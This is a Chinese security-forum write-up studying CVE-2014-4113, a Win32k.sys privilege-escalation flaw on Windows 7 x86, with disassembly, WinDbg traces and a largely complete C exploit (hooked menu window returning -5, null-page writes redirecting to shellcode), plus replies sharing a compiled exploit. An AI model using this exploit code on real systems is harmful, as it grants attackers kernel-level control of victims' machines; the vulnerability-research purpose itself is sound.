首页
社区
课程
招聘
[原创]CVE-2014-4113提权漏洞学习笔记
2022-3-11 15:58 22964

[原创]CVE-2014-4113提权漏洞学习笔记

2022-3-11 15:58
22964

一.前言

1.漏洞描述

该漏洞发生的位置是在驱动文件Win32k.sys中的xxxHandleMenuMessage函数,产生的原因是没有对该函数中调用的xxxMNFindWindowFromPoint函数的返回值进行合法性验证,直接将其作为参数传递给后面的xxxSendMessage函数调用,从而造成了提权漏洞。

2.实验环境

  • 操作系统:Win7 x86 sp1 专业版

  • 编译器:Visual Studio 2017

  • 调试器:IDA Pro,WinDbg

二.漏洞分析

1.静态分析

通过IDA直接查看xxxHandleMenuMessage函数,可以在其中看到,在该函数中,会首先调用xxxMNFindWindowFromPoint函数,然后将该函数的返回值作为第一个参数被下面的xxxSendMessage函数调用。

xxxSendMessage函数是通过调用xxxSendMessageTimeout函数来实现的,而在xxxSendMessageTimeout中会有如下的代码:

.text:BF8B94E8                 push    [ebp+Src]
.text:BF8B94EB                 push    dword ptr [ebp+UnicodeString]
.text:BF8B94EE                 push    ebx
.text:BF8B94EF                 push    esi
.text:BF8B94F0                 call    dword ptr [esi+60h]
.text:BF8B94F3                 mov     ecx, [ebp+arg_18]
.text:BF8B94F6                 test    ecx, ecx
.text:BF8B94F8                 jz      loc_BF8B9591

此时esi保存的就是xxxSendMessage第一个参数的值,也就是说此时esi=iRet。因此,如果xxxMNFindWindowFromPoint函数的返回值为-5的话,那么,此时call dword ptr [esi + 0x60]就会是call dword ptr [-5 + 0x60],就等于call dword ptr [0x5B]。此时,可以通过在0x5B处保存要执行的ShellCode的地址,那么此处的call dword ptr [esi+0x60]就会执行指定的ShellCode。

而在xxxMNFindWindowFromPoint函数中,会调用xxxSendMessage来发送一个0x1EB的消息。如果xxxSendMessage函数的返回值非0的话(比如-5),那么该返回值就会作为xxxMNFindWindowFromPoint函数的返回值返回回去。

这里IDA反编译的结果出了问题,在反汇编的代码中是可以看到,此处的xxxSendMessage函数发送的消息是0x1EB的消息:

.text:BF9395E4                 push    eax             ; Src
.text:BF9395E5                 lea     eax, [ebp+UnicodeString]
.text:BF9395E8                 push    eax             ; UnicodeString
.text:BF9395E9                 push    1EBh            ; MbString
.text:BF9395EE                 push    dword ptr [edi+0Ch] ; P
.text:BF9395F1                 call    _xxxSendMessage@16 ; xxxSendMessage(x,x,x,x)
.text:BF9395F6                 mov     esi, eax

2.动态分析

运行exp,在xxxMNFindWindowFromPoint函数发送消息的地址下断点

中断以后,调用函数发送消息,然后查看返回值可以看到此时的返回值就是-5

kd> g
Breakpoint 0 hit
win32k!xxxMNFindWindowFromPoint+0x53:
838995f1 e8a7fff7ff      call    win32k!xxxSendMessage (8381959d)
kd> p
win32k!xxxMNFindWindowFromPoint+0x58:
838995f6 8bf0            mov     esi,eax
kd> r eax
eax=fffffffb

继续运行到xxxMNFindWindowFromPoint函数返回前,可以看到此时的返回值为-5

继续向下运行到xxxSendMessageTimeout调用函数处的call dword ptr [esi + 60h],可以看到此时的esi等于-5,而0x5B保存了要执行的ShellCode的地址

继续运行,就会运行ShellCode的代码完成提权

三.漏洞利用

想要成功触发该漏洞,需要使用TrackPopupMenu函数,该函数定义如下:

BOOL TrackPopupMenu(HMENU hMenu,
		   UINT uFlags,
		   int x,
		   int y, 
  		   int nReserved,
           HWND hWnd,   
           const RECT* prcRect);

其中第一个参数hMenu是一个pop-up菜单,第六个参数hWnd则是拥有该菜单的窗口句柄,因此在exp中要创建好这些窗口,然后调用函数触发漏洞:

    HWND hWnd = NULL;
	WNDCLASS wc = { 0 };
	HMENU hMenu1 = NULL, hMenu2 = NULL;
	MENUITEMINFO Item1 = { 0 }, Item2 = { 0 };

	memset(&wc, 0, sizeof(wc));

	wc.hInstance = GetModuleHandle(NULL);
	wc.lpfnWndProc = WndProc;
	wc.lpszClassName = "1900";

	if (!RegisterClassA(&wc))
	{
		ShowError("RegisterClassA", GetLastError());
		bRet = FALSE;
		goto exit;
	}

	hWnd = CreateWindowA(wc.lpszClassName,
			       "",
			       WS_OVERLAPPEDWINDOW | WS_VISIBLE,
			       0,
			       0,
			       640,
			       480,
			       NULL,
			       NULL,
			       wc.hInstance,
			       NULL);
	if (!hWnd)
	{
		ShowError("CreateWindowEx", GetLastError());
		bRet = FALSE;
		goto exit;
	}

	hMenu1 = CreatePopupMenu();
	if (!hMenu1)
	{
		ShowError("CreatePopupMenu", GetLastError());
		bRet = FALSE;
		goto exit;
	}

	memset(&Item1, 0, sizeof(Item1));
	memset(&Item2, 0, sizeof(Item2));

	Item1.cbSize = sizeof(Item1);
	Item1.fMask = MIIM_STRING;
	if (!InsertMenuItemA(hMenu1, 0, TRUE, &Item1))
	{
		ShowError("InsertMenuItemA 1", GetLastError());
		bRet = FALSE;
		goto exit;
	}

	hMenu2 = CreatePopupMenu();
	if (!hMenu2)
	{
		ShowError("CreatePopupMenu 2", GetLastError());
		bRet = FALSE;
		goto exit;
	}

	Item2.fMask = MIIM_STRING | MIIM_SUBMENU;
	Item2.dwTypeData = "";
	Item2.cch = 1;
	Item2.hSubMenu = hMenu1;
	Item2.cbSize = sizeof(Item2);

	if (!InsertMenuItemA(hMenu2, 0, TRUE, &Item2))
	{
		ShowError("InsertMenuItemA 2", GetLastError());
		bRet = FALSE;
		goto exit;
	}

	// 触发漏洞
	if (!TrackPopupMenu(hMenu2, 0, 0, 0, 0, hWnd, NULL))
	{
		ShowError("TrackPopupMenu", GetLastError());
		bRet = FALSE;
		goto exit;
	}

同时,在主窗口的处理函数中,也需要进行判断。如果窗口处于空闲状态,需要通过PostMessage函数来模拟鼠标和键盘的操作,这样才能成功发送0x1EB的消息来达到漏洞点

LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	// 如果窗口处于空间状态
	if (uMsg == WM_ENTERIDLE)
	{
		PostMessageA(hWnd, WM_KEYDOWN, VK_DOWN, 0);
		PostMessageA(hWnd, WM_KEYDOWN, VK_RIGHT, 0);
		PostMessageA(hWnd, WM_LBUTTONDOWN, 0, 0);
	}

	return DefWindowProcA(hWnd, uMsg, wParam, lParam);
}

为了让xxxSendMessage函数返回-5触发漏洞,还需要通过SetWindowHook来加入钩子函数,

	HHOOK winHook = SetWindowsHookExA(WH_CALLWNDPROC,
					     WndProcHook,
					     NULL,
					     GetCurrentThreadId());
	if (winHook == NULL)
	{
		ShowError("SetWindowsHookExA", GetLastError());
		bRet = FALSE;
		goto exit;
	}

在钩子函数中,拦截0x1EB的消息,通过SetWindowLongA函数来修改菜单窗口的属性。这里的第二个参数传入的是GWL_WNDPROC,意味着修改的是窗口的处理函数

LRESULT CALLBACK WndProcHook(int nCode, WPARAM wParam, LPARAM lParam)
{
	CWPSTRUCT *pWndProcArgs = (CWPSTRUCT *)lParam;

	if (pWndProcArgs->message == 0x1EB)
	{
		if (UnhookWindowsHook(WH_CALLWNDPROC, WndProcHook))
		{
			lpPrevWndFunc = (WNDPROC)SetWindowLongA(pWndProcArgs->hwnd,
								GWL_WNDPROC,
								(LONG)MenuWndProc);
			if (lpPrevWndFunc == 0)
			{
				ShowError("SetWindowLongA", GetLastError());
			}
		}
	}

	return CallNextHookEx(NULL, nCode, wParam, lParam);
}

在窗口处理函数中,如果接收的消息是0x1EB的消息,则调用EndMenu函数销毁窗口且返回-5来触发漏洞

LRESULT CALLBACK MenuWndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	if (uMsg == 0x1EB)
	{
		EndMenu();
		return -5;
	}

	return CallWindowProcA(lpPrevWndFunc, hWnd, uMsg, wParam, lParam);
}

最后,由于在xxxSendMessageTimeout中还有如下的验证:

此时的p就是传递的-5,所以在0地址申请内存成功以后,除了将0x5B地址的内容修改为ShellCode的地址外,还需要将0x3和0x11处的数据修改为如下数据:

BOOL Init()
{
	BOOL bRet = TRUE;

	// 在0地址申请内存成功
	if (AllocateZeroMemory())
	{
		*(DWORD*)(0x3) = GetPtiCurrent();
		*(BYTE*)(0x11) = (BYTE)4;
		*(DWORD*)(0x5B) = (DWORD)ShellCode;
	}
	else bRet = FALSE;

	return bRet;
}

DWORD GetPtiCurrent()
{
	__asm
	{
		mov eax, fs:[0x18]
		mov eax, [eax + 0x40]
	}
}

四.运行结果

完整代码的链接为:https://github.com/LegendSaber/exp/blob/master/exp/CVE-2014-4113.cpp

最后在系统上运行结果如下,可以看到提权成功。

五.参考资料


[培训]《安卓高级研修班(网课)》月薪三万计划

最后于 2022-8-5 10:53 被1900编辑 ,原因:
收藏
点赞6
打赏
分享
打赏 + 50.00雪花
打赏次数 1 雪花 + 50.00
 
赞赏  Editor   +50.00 2022/04/01 恭喜您获得“雪花”奖励,安全圈有你而精彩!
最新回复 (9)
雪    币: 229
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
浅汐 2022-4-1 18:35
2
0
问个很菜鸟的问题,Win32k.sys中的xxxHandleMenuMessage函数是它的导出函数吗?在导出表中并没有找到,该怎么找到它的代码实现呢?
雪    币: 22383
活跃值: (25200)
能力值: ( LV15,RANK:910 )
在线值:
发帖
回帖
粉丝
1900 6 2022-4-1 20:07
3
0
浅汐 问个很菜鸟的问题,Win32k.sys中的xxxHandleMenuMessage函数是它的导出函数吗?在导出表中并没有找到,该怎么找到它的代码实现呢?
没有导出来 你要在IDA里面搜
雪    币: 159
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
F2zZ 2022-6-11 15:34
4
0
想学习一下,请问没有补丁的镜像在哪里找的呢
雪    币: 22383
活跃值: (25200)
能力值: ( LV15,RANK:910 )
在线值:
发帖
回帖
粉丝
1900 6 2022-6-11 15:58
5
0
F2zZ 想学习一下,请问没有补丁的镜像在哪里找的呢
MSDN我告诉你上面有很多。。
雪    币: 159
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
F2zZ 2022-6-11 16:10
6
1
1900 MSDN我告诉你上面有很多。。
嗯,我就是在上面下载的,win7 x86 sp1打过补丁了。
0x3,0x11两个检测点偏移也变了
雪    币: 22383
活跃值: (25200)
能力值: ( LV15,RANK:910 )
在线值:
发帖
回帖
粉丝
1900 6 2022-6-11 17:22
7
0
F2zZ 嗯,我就是在上面下载的,win7 x86 sp1打过补丁了。 0x3,0x11两个检测点偏移也变了
你装系统的时候不要让它自动更新
雪    币: 234
活跃值: (736)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
筱小 2022-8-3 17:23
8
0
师傅,你那有没有编译好的exp的exe,那个2019导入项目有点问题
雪    币: 22383
活跃值: (25200)
能力值: ( LV15,RANK:910 )
在线值:
发帖
回帖
粉丝
1900 6 2022-8-5 10:27
9
0
筱小 师傅,你那有没有编译好的exp的exe,那个2019导入项目有点问题

这是针对这个漏洞编译好的exp

上传的附件:
雪    币: 234
活跃值: (736)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
筱小 2022-8-11 09:28
10
0
1900 这是针对这个漏洞编译好的exp
好的,谢谢1900大师傅
游客
登录 | 注册 方可回帖
返回